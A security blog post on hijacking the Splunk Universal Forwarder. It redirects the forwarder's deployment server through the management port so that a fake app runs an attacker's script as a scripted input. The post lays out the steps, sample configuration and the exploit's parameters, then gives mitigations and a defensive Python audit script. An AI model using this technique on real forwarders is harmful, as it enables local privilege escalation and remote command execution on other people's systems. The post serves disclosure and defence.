Splunk Universal Forwarder Hijacking

Background

Airman
Feb 27, 2018

Splunk Universal Forwarder includes a management service (splunkd's REST interface) that listens on TCP port 8089 and is used for managing the forwarder. By default it accepts remote connections, but the default credentials (admin/changeme) are only honoured for connections from localhost. The technique described below can therefore be used in two ways:

  • Local privilege escalation to the user the forwarder runs as, if the default password has not been changed.
  • Remote command execution, with the privileges the forwarder runs under, if the default password has been changed and the new one is known to the attacker.

Please note that this does not necessarily qualify as a vulnerability in the product, though in my opinion running a management service on the forwarder is not a good architectural decision, as it increases the attack surface unnecessarily. Not running the service, or forcing a change of the default admin password at install time, would have been better options. The forwarder also has no account lockout mechanism, so brute forcing the admin password over the management port is feasible; a weak non-default password buys little.

How Does It Work

  1. The exploit authenticates to the forwarder's management port and points the forwarder's deployment server setting at the attacker's machine, where the exploit runs a fake deployment server.
  2. The forwarder then phones home to the attacker machine and requests its deployment applications.
  3. The exploit responds with a fake application containing a scripted input, which instructs the forwarder to run the attacker's script with the forwarder's privileges.
  4. After a delay, the exploit connects to the management port again and reverts the deployment server configuration to its original value.
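What the moving parts above look like on disk. This is an added illustration of the Splunk configuration formats involved, not the author's exploit code: the app name evil_app and the script name run.sh are assumed, and LHOST:LPORT are the exploit parameters described below.

```ini
# $SPLUNK_HOME/etc/system/local/deploymentclient.conf on the forwarder once the
# deployment server has been redirected (the exploit later puts the original
# targetUri back)
[target-broker:deploymentServer]
targetUri = LHOST:LPORT

# $SPLUNK_HOME/etc/apps/evil_app/local/inputs.conf, delivered by the fake
# deployment server; the path is relative to the app directory
# (app and script names are assumed for this illustration)
[script://./bin/run.sh]
interval = 60
disabled = 0
```

A scripted input is an ordinary Splunk feature: splunkd runs the command on the given interval as its own service account, which is why the technique yields exactly the privileges the forwarder runs under. The same inputs.conf stanza, in any app under $SPLUNK_HOME/etc/apps, is the durable artifact to look for on a forwarder after the deployment server setting has been reverted.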

The Exploit

Exploit parameters (review and change within the .py script):

RHOST — target machine, 127.0.0.1 for local privilege escalation. Default Splunk credentials are only accepted for local connections.

RPORT — management port of the Splunk Universal Forwarder, 8089 by default.

LHOST — attacker’s IP where the for

LPORT — port number to run the fake deployment server on.

SPLUNK_USER/SPLUNK_PASSWORD — credentials to authenticate to the forwarder.

SCRIPT — path to the script to be sent to the forwarder for execution.

Mitigation

Option 1: change the default admin password on the forwarder, and use a strong one, since there is no lockout to slow down brute forcing. On its own this closes the local privilege escalation path but still leaves remote execution open to anyone who obtains the password.

Option 2: disable the management network port on the forwarder by adding the following to $SPLUNK_HOME/etc/system/local/server.conf (the [httpServer] stanza is a server.conf setting):

[httpServer]
disableDefaultPort = true

This can be pushed remotely from the deployment server: https://answers.splunk.com/answers/434029/how-to-disable-the-universal-forwarder-default-man.html

Note: this might not be a supported configuration, and some CLI commands will stop working (for example, splunk show deploy-poll) because they talk to the management service. With the port disabled the forwarder can no longer be reached by the exploit at all, locally or remotely, so option 2 covers both attack paths; option 1 only covers the default-credential one.
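A defender-side check for both the hijack and the mitigations, added here as an example; it is not part of the original post and not Splunk's own tooling. It parses the three Splunk configuration files involved (deploymentclient.conf, an app's inputs.conf, server.conf) using their real stanza and key names, and flags a deployment server that is not on an allow-list, enabled scripted inputs inside deployed apps, and a management port that is still enabled. The host names, the app names and the sample configuration text are constructed for the example, and the allow-list is an assumption you fill in from your own deployment server.

```python
"""Audit a Universal Forwarder's configuration for the hijack described above.

Added example (not the author's exploit, not Splunk tooling). Flags:
  * a deployment server target that is not on the allow-list,
  * enabled [script://...] stanzas delivered in an app,
  * a management port that is still enabled ([httpServer] disableDefaultPort).
The sample .conf text at the bottom is constructed; file and stanza names are
Splunk's, hosts and app names are made up.
"""
import configparser
from typing import Dict, Iterable, List, Optional


def parse_conf(text: str) -> configparser.ConfigParser:
    """Parse Splunk .conf text. Keys are case-sensitive, values have no
    interpolation, and stanzas or keys may legitimately repeat."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True)
    cp.optionxform = str  # keep targetUri / disableDefaultPort as written
    cp.read_string(text)
    return cp


def _is_true(value: str) -> bool:
    return value.strip().lower() in ("1", "true", "t", "yes", "y")


def deployment_target(deploymentclient_conf: str) -> Optional[str]:
    """host:port the forwarder phones home to (what the exploit rewrites)."""
    cp = parse_conf(deploymentclient_conf)
    return cp.get("target-broker:deploymentServer", "targetUri", fallback=None)


def script_inputs(inputs_conf: str) -> List[str]:
    """Enabled [script://...] stanzas: each one is a command splunkd will run."""
    cp = parse_conf(inputs_conf)
    return [s for s in cp.sections()
            if s.startswith("script://")
            and not _is_true(cp.get(s, "disabled", fallback="0"))]


def management_port_disabled(server_conf: str) -> bool:
    """True when server.conf carries [httpServer] disableDefaultPort = true."""
    cp = parse_conf(server_conf)
    return _is_true(cp.get("httpServer", "disableDefaultPort", fallback="false"))


def audit(deploymentclient_conf: str, app_inputs: Dict[str, str],
          server_conf: str, allowed_targets: Iterable[str]) -> List[str]:
    """One finding per suspicious condition; an empty list means clean."""
    findings: List[str] = []
    target = deployment_target(deploymentclient_conf)
    if target is not None and target not in set(allowed_targets):
        findings.append(f"deployment server points at {target}")
    for app, text in app_inputs.items():
        for stanza in script_inputs(text):
            findings.append(f"app {app} has enabled scripted input {stanza}")
    if not management_port_disabled(server_conf):
        findings.append("management port enabled: [httpServer] disableDefaultPort is not true")
    return findings


# --- constructed samples, not taken from a real forwarder ---
HIJACKED_DEPLOYMENTCLIENT = """\
[deployment-client]
phoneHomeIntervalInSecs = 60

[target-broker:deploymentServer]
targetUri = 203.0.113.10:9999
"""
LEGIT_DEPLOYMENTCLIENT = """\
[target-broker:deploymentServer]
targetUri = deploy.example.com:8089
"""
FAKE_APP_INPUTS = """\
[script://./bin/run.sh]
interval = 60
disabled = 0
"""
BENIGN_APP_INPUTS = """\
[monitor:///var/log/syslog]
sourcetype = syslog
"""
SERVER_DEFAULT = ""  # no [httpServer] stanza: port 8089 stays open
SERVER_HARDENED = "[httpServer]\ndisableDefaultPort = true\n"
ALLOWED = {"deploy.example.com:8089"}  # assumption: your real deployment server

if __name__ == "__main__":
    for line in audit(HIJACKED_DEPLOYMENTCLIENT,
                      {"evil_app": FAKE_APP_INPUTS, "syslog": BENIGN_APP_INPUTS},
                      SERVER_DEFAULT, ALLOWED):
        print("FINDING:", line)
```

On a real forwarder feed it $SPLUNK_HOME/etc/system/local/deploymentclient.conf, every default/inputs.conf and local/inputs.conf under $SPLUNK_HOME/etc/apps, and $SPLUNK_HOME/etc/system/local/server.conf. The deployment-server check only catches the window before the exploit reverts the setting, so the scripted-input check is the durable one; legitimate apps also use scripted inputs, so compare its output against what your deployment server is expected to push rather than treating every hit as hostile.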

Written by Airman
Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.